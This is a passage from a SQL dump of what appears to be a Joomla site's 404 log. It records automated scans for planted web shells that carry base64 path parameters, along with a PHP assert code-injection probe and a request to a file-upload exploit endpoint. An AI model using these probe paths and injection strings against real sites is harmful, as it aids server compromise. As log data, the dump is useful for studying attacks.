00:00:00'),(13028,'http://hallcrestheights.org/sql_dump.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:19:18','0000-00-00 00:00:00'),(13029,'http://hallcrestheights.org/jconfig.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-23 13:20:45','0000-00-00 00:00:00'),(13030,'http://hallcrestheights.org/thumb.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:22:28','0000-00-00 00:00:00'),(13031,'http://hallcrestheights.org/al277.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:23:25','0000-00-00 00:00:00'),(13032,'http://hallcrestheights.org/images/al277.php?z3=N3V0RnlSLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:23:27','0000-00-00 00:00:00'),(13033,'http://hallcrestheights.org/wsdl.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-23 13:23:50','0000-00-00 00:00:00'),(13034,'http://hallcrestheights.org/wp-data.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:23:52','0000-00-00 00:00:00'),(13035,'http://hallcrestheights.org/media/1ndex.php?z3=N3V0RnlSLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:23:48','0000-00-00 00:00:00'),(13036,'http://hallcrestheights.org/media/tmp.php?z3=N3V0RnlSLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:23:57','0000-00-00 00:00:00'),(13037,'http://hallcrestheights.org/google-assist.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:26:08','0000-00-00 00:00:00'),(13038,'http://hallcrestheights.org/images/google-assist.php?z3=N3V0RnlSLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-11-23 13:26:55','0000-00-00 00:00:00'),(13039,'http://hallcrestheights.org/elements.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:26:56','0000-00-00 00:00:00'),(13040,'http://hallcrestheights.org/cache/defau1t.php?z3=N3V0RnlSLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-23 13:26:45','0000-00-00 00:00:00'),(13041,'http://hallcrestheights.org/roubt.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-23 13:28:17','0000-00-00 00:00:00'),(13042,'http://hallcrestheights.org/bookmark.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:28:51','0000-00-00 00:00:00'),(13043,'http://hallcrestheights.org/wp-content/plugins/myshe.php?z3=N3V0RnlSLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-11-23 13:28:31','0000-00-00 00:00:00'),(13044,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=N3V0RnlSLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-11-23 13:30:27','0000-00-00 00:00:00'),(13045,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=N3V0RnlSLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:30:30','0000-00-00 00:00:00'),(13046,'http://hallcrestheights.org/modules/mod_bookmark/helper.php?z3=N3V0RnlSLnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-23 13:32:12','0000-00-00 00:00:00'),(13047,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=N3V0RnlSLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:33:24','0000-00-00 00:00:00'),(13048,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=N3V0RnlSLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:33:56','0000-00-00 00:00:00'),(13049,'http://hallcrestheights.org/modules/modules/modules.php?z3=N3V0RnlSLnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:34:04','0000-00-00 00:00:00'),(13050,'http://hallcrestheights.org/wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=N3V0RnlSLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:34:18','0000-00-00 00:00:00'),(13051,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=N3V0RnlSLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:34:26','0000-00-00 00:00:00'),(13052,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=N3V0RnlSLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:36:03','0000-00-00 00:00:00'),(13053,'http://hallcrestheights.org/email.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-23 13:38:27','0000-00-00 00:00:00'),(13054,'http://hallcrestheights.org/images/stories/0day.php?z3=N3V0RnlSLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:38:29','0000-00-00 00:00:00'),(13055,'http://hallcrestheights.org/install.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:39:19','0000-00-00 00:00:00'),(13056,'http://hallcrestheights.org/goog1es.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-23 13:40:01','0000-00-00 00:00:00'),(13057,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=N3V0RnlSLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:43:34','0000-00-00 00:00:00'),(13058,'http://hallcrestheights.org/shootmei.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:43:37','0000-00-00 00:00:00'),(13059,'http://hallcrestheights.org/Abbrevsprl.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-23 13:48:11','0000-00-00 00:00:00'),(13060,'http://hallcrestheights.org/M-J!r4ya-F4r3s.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-23 13:50:01','0000-00-00 00:00:00'),(13061,'http://hallcrestheights.org/cache/support.php?z3=N3V0RnlSLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-23 13:59:28','0000-00-00 00:00:00'),(13062,'http://hallcrestheights.org/authenticating.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 14:02:32','0000-00-00 00:00:00'),(13063,'http://hallcrestheights.org/show.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 14:02:43','0000-00-00 00:00:00'),(13064,'http://hallcrestheights.org/cache/news.php?z3=N3V0RnlSLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 14:02:53','0000-00-00 00:00:00'),(13065,'http://hallcrestheights.org/images/head.php?z3=N3V0RnlSLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-23 14:03:05','0000-00-00 00:00:00'),(13066,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=N3V0RnlSLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-23 14:03:15','0000-00-00 00:00:00'),(13067,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=N3V0RnlSLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-23 14:03:25','0000-00-00 00:00:00'),(13068,'http://hallcrestheights.org/files/files.php?z3=N3V0RnlSLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 14:04:29','0000-00-00 00:00:00'),(13069,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=N3V0RnlSLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-23 14:04:42','0000-00-00 00:00:00'),(13070,'http://hallcrestheights.org/cache/list.php?z3=N3V0RnlSLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 14:06:07','0000-00-00 00:00:00'),(13071,'http://hallcrestheights.org/images/laj.php?z3=N3V0RnlSLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-23 14:10:12','0000-00-00 00:00:00'),(13072,'http://hallcrestheights.org/log.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 14:09:08','0000-00-00 00:00:00'),(13073,'http://hallcrestheights.org/includes/u2p.php?z3=N3V0RnlSLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 14:10:33','0000-00-00 00:00:00'),(13074,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=N3V0RnlSLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 14:10:42','0000-00-00 00:00:00'),(13075,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=N3V0RnlSLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-23 14:09:32','0000-00-00 00:00:00'),(13076,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=N3V0RnlSLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 14:10:59','0000-00-00 00:00:00'),(13077,'http://hallcrestheights.org/wp-main.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 14:09:57','0000-00-00 00:00:00'),(13078,'http://hallcrestheights.org/images/robots.txt.php?z3=N3V0RnlSLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-23 14:11:23','0000-00-00 00:00:00'),(13079,'http://hallcrestheights.org/cli/40dd1d.php?z3=N3V0RnlSLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-11-23 14:11:31','0000-00-00 00:00:00'),(13080,'http://hallcrestheights.org/6c3feced5fe97be15edcefad3cdc76e7.php',NULL,'hallcrestheights.org','',1,0,'2017-11-23 15:37:33','0000-00-00 00:00:00'),(13081,'http://hallcrestheights.org/index.php?option=com_users&view=registration',NULL,'','',2,0,'2017-11-25 16:28:02','0000-00-00 00:00:00'),(13082,'http://hallcrestheights.org/media/joomla-update.php',NULL,'hallcrestheights.org','',2,0,'2017-11-29 09:19:45','0000-00-00 00:00:00'),(13083,'http://hallcrestheights.org/modules/mod_add/mod_add.php',NULL,'hallcrestheights.org','',1,0,'2017-11-29 16:23:15','0000-00-00 00:00:00'),(13084,'http://hallcrestheights.org/modules/mod_mylivechat/widform.php',NULL,'hallcrestheights.org','',1,0,'2017-11-29 16:30:53','0000-00-00 00:00:00'),(13085,'http://hallcrestheights.org/modules/mod_phocagallery_image/mod_phocagallery_image.php',NULL,'hallcrestheights.org','',1,0,'2017-11-29 16:36:30','0000-00-00 00:00:00'),(13086,'http://hallcrestheights.org/cache/index.php',NULL,'hallcrestheights.org','',2,0,'2017-11-30 08:44:42','0000-00-00 00:00:00'),(13087,'http://hallcrestheights.org/cache/search.php',NULL,'hallcrestheights.org','',1,0,'2017-11-30 08:52:51','0000-00-00 00:00:00'),(13088,'http://hallcrestheights.org/wp-admin/includes/class-wp-text.php?checker-page',NULL,'hallcrestheights.org','',1,0,'2017-11-30 14:18:09','0000-00-00 00:00:00'),(13089,'http://hallcrestheights.org/libraries/joomla/application/joomla-app.php?checker-page',NULL,'hallcrestheights.org','',1,0,'2017-11-30 14:18:31','0000-00-00 00:00:00'),(13090,'http://www.hallcrestheights.org/ixnmueah-whioz-k36320-hjxbnwpg-eyooayi-i20162632-kuks-szqce.htm',NULL,'','',1,0,'2017-12-01 17:45:18','0000-00-00 00:00:00'),(13091,'http://www.hallcrestheights.org/&wd=test',NULL,'http://www.baidu.com/s?wd=BY6','',13,0,'2017-12-04 00:42:19','0000-00-00 00:00:00'),(13092,'http://www.hallcrestheights.org/license.php',NULL,'','',12,0,'2017-12-05 04:04:06','0000-00-00 00:00:00'),(13093,'http://hallcrestheights.org/wp-set.php?viagrascoreone=true',NULL,'hallcrestheights.org','',1,0,'2017-12-08 17:47:32','0000-00-00 00:00:00'),(13094,'http://www.hallcrestheights.org/i20162632-k61064-ryvhr-hmqt-yysl-lgeajanp.htm',NULL,'','',1,0,'2017-12-09 00:24:55','0000-00-00 00:00:00'),(13095,'http://hallcrestheights.org/far.php',NULL,'','',2,0,'2017-12-10 17:45:32','0000-00-00 00:00:00'),(13096,'http://hallcrestheights.org/rep.php',NULL,'','',2,0,'2017-12-10 17:45:33','0000-00-00 00:00:00'),(13097,'http://hallcrestheights.org/replace.php',NULL,'','',2,0,'2017-12-10 17:46:55','0000-00-00 00:00:00'),(13098,'http://hallcrestheights.org/tools/replace.php',NULL,'','',1,0,'2017-12-10 17:45:35','0000-00-00 00:00:00'),(13099,'http://hallcrestheights.org/media/media.php?1=assert&2=print(md5(12345));',NULL,'hallcrestheights.org','',1,0,'2017-12-12 08:42:44','0000-00-00 00:00:00'),(13100,'http://hallcrestheights.org/xml.php',NULL,'hallcrestheights.org','',2,0,'2017-12-12 15:35:07','0000-00-00 00:00:00'),(13101,'http://hallcrestheights.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload',NULL,'','',6,0,'2017-12-13 19:57:56','0000-00-00 00:00:00'),(13102,'http://hallcrestheights.org/libraries/joomla/template/popup-pomo.php',NULL,'http://site.ru','',2,0,'2017-12-14 15:23:53','0000-00-00 00:00:00'),(13103,'http://hallcrestheights.org/mide.php',NULL,'http://site.ru','',8,0,'2017-12-14 15:25:30','0000-00-00 00:00:00'),(13104,'http://hallcrestheights.org/lfm.php',NULL,'http://site.ru','',3,0,'2017-12-14 16:41:29','0000-00-00 00:00:00'),(13105,'http://hallcrestheights.org/conflg.php',NULL,'http://site.ru','',4,0,'2017-12-14 21:43:36','0000-00-00 00:00:00'),(13106,'http://hallcrestheights.org/conf.ini.php',NULL,'http://site.ru','',2,0,'2017-12-15 05:59:09','0000-00-00 00:00:00'),(13107,'http://hallcrestheights.org/phpmyadmin/syijg.php',NULL,'http://site.ru','',5,0,'2017-12-15 06:30:20','0000-00-00 00:00:00'),(13108,'http://hallcrestheights.org/templates/ananda/gnb.php',NULL,'http://site.ru','',2,0,'2017-12-15 10:37:37','0000-00-00 00:00:00'),(13109,'http://hallcrestheights.org/libraries/joomla/client/lauth.php',NULL,'http://site.ru','',2,0,'2017-12-15 11:57:00','0000-00-00 00:00:00'),(13110,'http://hallcrestheights.org/logs/ybbbcc.php',NULL,'http://site.ru','',4,0,'2017-12-15 14:21:28','0000-00-00 00:00:00'),(13111,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/folders.php',NULL,'http://site.ru','',3,0,'2017-12-15 14:21:53','0000-00-00 00:00:00'),(13112,'http://hallcrestheights.org/wp-models.php',NULL,'http://site.ru','',2,0,'2017-12-15 14:37:05','0000-00-00 00:00:00'),(13113,'http://hallcrestheights.org/libraries/joomla/template/bookmark.php',NULL,'http://site.ru','',4,0,'2017-12-15 16:01:46','0000-00-00 00:00:00'),(13114,'http://hallcrestheights.org/cli/system_infos.php',NULL,'http://site.ru','',4,0,'2017-12-15 22:44:22','0000-00-00 00:00:00'),(13115,'http://hallcrestheights.org/xmlrpz.php',NULL,'http://site.ru','',10,0,'2017-12-15 23:52:38','0000-00-00 00:00:00'),(13116,'http://hallcrestheights.org/maints/popup-pomo.php',NULL,'http://site.ru','',6,0,'2017-12-16 04:47:26','0000-00-00 00:00:00'),(13117,'http://hallcrestheights.org/termsa/popup-pomo.php',NULL,'http://site.ru','',4,0,'2017-12-16 07:55:41','0000-00-00 00:00:00'),(13118,'http://hallcrestheights.org/cli/css.php',NULL,'http://site.ru','',3,0,'2017-12-16 07:56:47','0000-00-00 00:00:00'),(13119,'http://hallcrestheights.org/dark.php',NULL,'http://site.ru','',3,0,'2017-12-16 09:21:02','0000-00-00 00:00:00'),(13120,'http://hallcrestheights.org/modules/mod_tags_popular/ntxxt.php',NULL,'http://site.ru','',2,0,'2017-12-16 11:53:39','0000-00-00 00:00:00'),(13121,'http://hallcrestheights.org/wp-includes/upgrade/theme-compat/popup-pomo.php',NULL,'http://site.ru','',6,0,'2017-12-16 17:55:39','0000-00-00 00:00:00'),(13122,'http://www.hallcrestheights.org/i20162628-vqjnyspv-k19540-holjp-eurrtpil-uourxiv-lbtr-hnnmt-qzkowt-sxpp-bgrrcdsi.htm',NULL,'','',1,0,'2017-12-16 18:43:29','0000-00-00 00:00:00'),(13123,'http://hallcrestheights.org/components/com_b2jcontact/',NULL,'','',15,0,'2017-12-17 07:11:44','0000-00-00 00:00:00'),(13124,'http://hallcrestheights.org//sqlbak.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-12-17 07:59:46','0000-00-00 00:00:00'),(13125,'http://hallcrestheights.org//sql-bak.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 07:59:56','0000-00-00 00:00:00'),(13126,'http://hallcrestheights.org//email.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:00:13','0000-00-00 00:00:00'),(13127,'http://hallcrestheights.org//functions.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:00:29','0000-00-00 00:00:00'),(13128,'http://hallcrestheights.org//cache/cachee.php?z3=Rk9QTzQzLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:00:44','0000-00-00 00:00:00'),(13129,'http://hallcrestheights.org//wp-admin/includes/rnnvhs.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWFkbWluL2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:01:31','0000-00-00 00:00:00'),(13130,'http://hallcrestheights.org//languages/rnnvhs.php?z3=Rk9QTzQzLnBocA==&z4=L2xhbmd1YWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:00:26','0000-00-00 00:00:00'),(13131,'http://hallcrestheights.org//images/rnnvhs.php?z3=Rk9QTzQzLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:02:04','0000-00-00 00:00:00'),(13132,'http://hallcrestheights.org//wp-admin/network/rnnvhs.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWFkbWluL25ldHdvcmsv',NULL,'hallcrestheights.org','',4,0,'2017-12-17 08:02:20','0000-00-00 00:00:00'),(13133,'http://hallcrestheights.org//language/en-GB/rnnvhs.php?z3=Rk9QTzQzLnBocA==&z4=L2xhbmd1YWdlL2VuLUdCLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:02:37','0000-00-00 00:00:00'),(13134,'http://hallcrestheights.org//cache/news.php?z3=Rk9QTzQzLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:01:46','0000-00-00 00:00:00'),(13135,'http://hallcrestheights.org//tmp.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-12-17 08:02:01','0000-00-00 00:00:00'),(13136,'http://hallcrestheights.org//shootme.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',8,0,'2017-12-17 08:02:16','0000-00-00 00:00:00'),(13137,'http://hallcrestheights.org//configurationbak.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:03:53','0000-00-00 00:00:00'),(13138,'http://hallcrestheights.org//robots.txt.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:04:10','0000-00-00 00:00:00'),(13139,'http://hallcrestheights.org//jconfig.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:04:27','0000-00-00 00:00:00'),(13140,'http://hallcrestheights.org//media/reads.php?z3=Rk9QTzQzLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:04:43','0000-00-00 00:00:00'),(13141,'http://hallcrestheights.org//wp-admin/users.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWFkbWluLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:04:59','0000-00-00 00:00:00'),(13142,'http://hallcrestheights.org//pols.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:03:55','0000-00-00 00:00:00'),(13143,'http://hallcrestheights.org//imdex.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:05:32','0000-00-00 00:00:00'),(13144,'http://hallcrestheights.org//aa.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:04:28','0000-00-00 00:00:00'),(13145,'http://hallcrestheights.org//ytt.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:04:43','0000-00-00 00:00:00'),(13146,'http://hallcrestheights.org//media/1ndex.php?z3=Rk9QTzQzLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:08:09','0000-00-00 00:00:00'),(13147,'http://hallcrestheights.org//libraries/joomla/jmails.php?z3=Rk9QTzQzLnBocA==&z4=L2xpYnJhcmllcy9qb29tbGEv',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:08:25','0000-00-00 00:00:00'),(13148,'http://hallcrestheights.org//sql_dump.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:08:41','0000-00-00 00:00:00'),(13149,'http://hallcrestheights.org//error-logs.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:07:52','0000-00-00 00:00:00'),(13150,'http://hallcrestheights.org//media/404.php?z3=Rk9QTzQzLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:09:31','0000-00-00 00:00:00'),(13151,'http://hallcrestheights.org//media/tmp.php?z3=Rk9QTzQzLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:09:46','0000-00-00 00:00:00'),(13152,'http://hallcrestheights.org//r3x.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:10:02','0000-00-00 00:00:00'),(13153,'http://hallcrestheights.org//log.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:10:18','0000-00-00 00:00:00'),(13154,'http://hallcrestheights.org//images/stories/0day.php?z3=Rk9QTzQzLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:10:34','0000-00-00 00:00:00'),(13155,'http://hallcrestheights.org//includes/u2p.php?z3=Rk9QTzQzLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:10:50','0000-00-00 00:00:00'),(13156,'http://hallcrestheights.org//images/xxx.php?z3=Rk9QTzQzLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:11:05','0000-00-00 00:00:00'),(13157,'http://hallcrestheights.org//al277.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:09:59','0000-00-00 00:00:00'),(13158,'http://hallcrestheights.org//wp-admin/options-media.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWFkbWluLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:11:39','0000-00-00 00:00:00'),(13159,'http://hallcrestheights.org//wp-content/advanced-cache.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:11:52','0000-00-00 00:00:00'),(13160,'http://hallcrestheights.org//roubt.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:12:41','0000-00-00 00:00:00'),(13161,'http://hallcrestheights.org//includes.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:11:34','0000-00-00 00:00:00'),(13162,'http://hallcrestheights.org//images/al277.php?z3=Rk9QTzQzLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:11:49','0000-00-00 00:00:00'),(13163,'http://hallcrestheights.org//webconfig.txt.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:13:26','0000-00-00 00:00:00'),(13164,'http://hallcrestheights.org//thumb.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:13:57','0000-00-00 00:00:00'),(13165,'http://hallcrestheights.org//configbak.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:15:11','0000-00-00 00:00:00'),(13166,'http://hallcrestheights.org//wp-main.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:15:28','0000-00-00 00:00:00'),(13167,'http://hallcrestheights.org//robot.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:14:24','0000-00-00 00:00:00'),(13168,'http://hallcrestheights.org//install.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:16:02','0000-00-00 00:00:00'),(13169,'http://hallcrestheights.org//images/1ndex.php?z3=Rk9QTzQzLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:16:20','0000-00-00 00:00:00'),(13170,'http://hallcrestheights.org//dswat.org/wsdl.php?z3=Rk9QTzQzLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:16:36','0000-00-00 00:00:00'),(13171,'http://hallcrestheights.org//resd.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:16:52','0000-00-00 00:00:00'),(13172,'http://hallcrestheights.org//injctory.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:17:07','0000-00-00 00:00:00'),(13173,'http://hallcrestheights.org//mmytc.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:16:03','0000-00-00 00:00:00'),(13174,'http://hallcrestheights.org//M-F4r3s.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:16:22','0000-00-00 00:00:00'),(13175,'http://hallcrestheights.org//images/laj.php?z3=Rk9QTzQzLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:17:59','0000-00-00 00:00:00'),(13176,'http://hallcrestheights.org//cache/cache_aqbmkwwx.php?z3=Rk9QTzQzLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:18:16','0000-00-00 00:00:00'),(13177,'http://hallcrestheights.org//wsdl.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:18:34','0000-00-00 